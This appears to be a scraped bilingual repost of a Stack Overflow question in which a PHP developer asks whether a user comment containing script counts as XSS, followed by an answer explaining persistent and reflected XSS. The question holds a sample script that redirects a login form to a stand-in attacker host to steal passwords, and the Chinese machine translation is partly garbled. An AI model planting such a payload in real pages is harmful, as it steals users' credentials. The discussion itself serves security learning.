用Javascript输入的HTML显示给其他人,但没有HTML转义的XSS示例 [英] Is user input of HTML with Javascript that is displayed to others but not HTML-escaped an example of a XSS
问题描述
据我所知,以下是两种主要的漏洞类型:影响Web应用程序: SQL注入可以用预处理语句修复 - 很简单。然而,我仍然没有真正获得XSS - is以下是XSS的例子吗?...
$ ul
$ SQL注入
非常好的评论
<! - 现在是一个邪恶的脚本(这里用jquery做例子,但很容易做到) - >
< script type =text / javascript>
$(document).ready(function(){
$('#login_form').attr('action','http://somehackysite.com/givemeyourpw.php');
});
< / script>
http://somehackysite.com/givemyourpw.php 然后用户的账户信息被盗。
<所以我在这里真的有三个问题:
- 这会起作用吗?
- 这是否是XSS?
- 是否有任何预防措施开发人员应该对付XSS而不是转义HTML?
- SQL Injection
- XSS
- Page full of user-made content has a login form at the top (site-wide).
- The user's input to the page is not HTML-escaped.
- A user posts the following content (e.g. a comment) to the page...
- An innocent user comes to the page, the script executes.
- The innocent user realises they're not logged in, and enter their details into the form.
- The user's details are sent off to
http://somehackysite.com/givemyourpw.phpand then the user's account details are stolen. - Would this work?
- Is this XSS?
- Are there any precautions developers should take against XSS other than escaping HTML?
ol>
XSS攻击有两种类型:反射XSS和持续XSS攻击。您所描述的内容,即站点用户输入的数据在服务器端保存并呈现给任何查看页面的用户,被视为持久XSS。类似的攻击可能是如果你在一个不能转义Javascript的帖子上有一个评论框,或者我可以添加任何内容的个人资料页面。
另一类XSS攻击是反映XSS。这些更复杂一些,但它们相当于网址中的某个参数不会被转义。他们经常出现在大型网站上的搜索页面。你会得到一个URL,其中包含一些JavaScript(对不起,我的例子在这里被渲染器弄坏了,所以我不能给你看一个例子),并且页面将呈现JavaScript,这将允许某人制造恶意URL。在提交任何财务数据的网站上,这些信息尤其危险;设想一个有良知的用户,他们总是进行检查以确保他们正在写入链接到他们的银行,但是由于反射的XSS攻击,攻击者能够将他们发送到他们银行网站上的合法页面,但这具有恶意代码。
无论如何,你的例子是Persistent XSS。用这种攻击你可以做更多的恶意事情,而不仅仅是改变登录表单发送用户的位置。他们多年来一直很喜欢从网站的个人领域获取信息,或者与CSRF结合使用,通过简单地查看页面来让认证用户执行某些操作。之前有一些MySpace病毒曾经这样做,并且从个人资料传播到个人资料。
I'm a PHP developer and I'm looking to improve the security of my sites.
From what I understand the following are two major types of vulnerabilities which affect web applications:
SQL Injection can be fixed with prepared statements - easy.
But I still don't really get XSS - is the following an example of XSS?...
A really nice comment
<!-- now an evil script (example here with jquery, but easily done without) --->
<script type="text/javascript">
$(document).ready(function() {
$('#login_form').attr('action','http://somehackysite.com/givemeyourpw.php');
});
</script>
So I really have three questions here:
There are two types are XSS attacks: Reflected XSS and Persistent XSS attacks. What you've described, where a user of the site inputs data that gets saved on the server side, and is rendered for anyone viewing a page, is considered Persistent XSS. Similar attacks would be if you have a comment box on a post that doesn't escape Javascript, or a profile page I can put anything into.
The other class of XSS attacks is Reflected XSS. These are a little more complicated, but they amount to one of the arguments in the URL for a page not being escaped. They frequently come up in things like Search pages on large websites. You'll get a URL that includes some javascript in it (sorry, my example got mangled by the renderer here, so I can't show you an example) , and the page will render the javascript which would allow someone to craft a malicious URL. These are especially dangerous on sites that hand any sort of financial data; imagine a conscientious user who always checks to make sure the they're going to the write link to their bank, but because of a Reflected XSS attack an attacker is able to send them to a legitimate page on their bank's website, but that has malicious code in it.
In any case, your example is Persistent XSS. You can do even more nefarious things with attacks like that than just changing where a login form sends users. They've been popular for years to do things like scraping information from personal areas of sites, or coupled with CSRF to cause an authenticated user to do something by simply looking at a page. There were a few MySpace viruses a while back that did that, and spread from profile to profile.
这篇关于用Javascript输入的HTML显示给其他人,但没有HTML转义的XSS示例的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
